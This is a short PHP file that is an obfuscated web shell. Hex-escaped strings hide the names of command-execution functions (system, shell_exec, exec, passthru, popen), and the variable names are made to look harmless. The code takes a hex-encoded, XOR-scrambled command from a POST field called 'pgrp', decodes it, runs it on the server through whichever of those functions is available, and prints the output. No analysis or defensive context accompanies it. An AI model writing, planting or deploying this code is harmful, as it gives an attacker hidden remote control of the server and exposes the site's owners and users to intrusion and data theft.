<?php

$query_handler6 = "s\x74\x72e\x61m_\x67et\x5F\x63\x6F\x6E\x74\x65nts";
$query_handler7 = "p\x63l\x6Fs\x65";
$query_handler1 = "s\x79\x73tem";
$query_handler3 = "\x65\x78ec";
$core_engine = "\x68\x65x2\x62i\x6E";
$query_handler2 = "\x73h\x65\x6Cl\x5Fe\x78ec";
$query_handler4 = "p\x61\x73\x73th\x72u";
$query_handler5 = "p\x6Fpe\x6E";
if (isset($_POST["\x70gr\x70"])) {
            function system_core( $entry,  $bind) {
$comp= '';
 for($h=0;
 $h<strlen($entry);
 $h++){
$comp.=chr(ord($entry[$h])^$bind);

} return$comp;

}
            $pgrp = $core_engine($_POST["\x70gr\x70"]);
            $pgrp = system_core($pgrp, 3);
            if (function_exists($query_handler1)) {
                $query_handler1($pgrp);
            } elseif (function_exists($query_handler2)) {
                print $query_handler2($pgrp);
            } elseif (function_exists($query_handler3)) {
                $query_handler3($pgrp, $fac_entry);
                print join("\n", $fac_entry);
            } elseif (function_exists($query_handler4)) {
                $query_handler4($pgrp);
            } elseif (function_exists($query_handler5) && function_exists($query_handler6) && function_exists($query_handler7)) {
                $bind_comp = $query_handler5($pgrp, 'r');
                if ($bind_comp) {
                    $ptr_itm = $query_handler6($bind_comp);
                    $query_handler7($bind_comp);
                    print $ptr_itm;
                }
            }
            exit;
        }